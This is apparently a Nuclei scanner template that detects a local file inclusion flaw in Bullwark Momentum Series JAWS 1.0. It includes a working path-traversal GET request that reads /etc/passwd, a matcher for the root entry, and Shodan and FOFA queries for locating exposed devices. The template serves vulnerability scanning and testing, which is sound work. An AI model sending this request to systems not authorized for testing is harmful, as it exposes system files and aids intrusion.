id: bullwark-momentum-lfi

info:
  name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/47773
    - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    shodan-query: Bullwark
    fofa-query: "Bullwark"
    version: Bullwark Momentum Series Web Server JAWS/1.0
  tags: BULLWARK-Momentum

http:
  - raw:
      - |
        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"

# digest: 4b0a00483046022100b8f3c45d78ecbd39b0a39b09e78b05c1aef4590b14426e666085bc1b9e26dc94022100b56824bf5fd76edad903df9b50bb22d849db2ebe20fd3af7d323d2065ea453de:922c64590222798bb761d5b6d8e72950
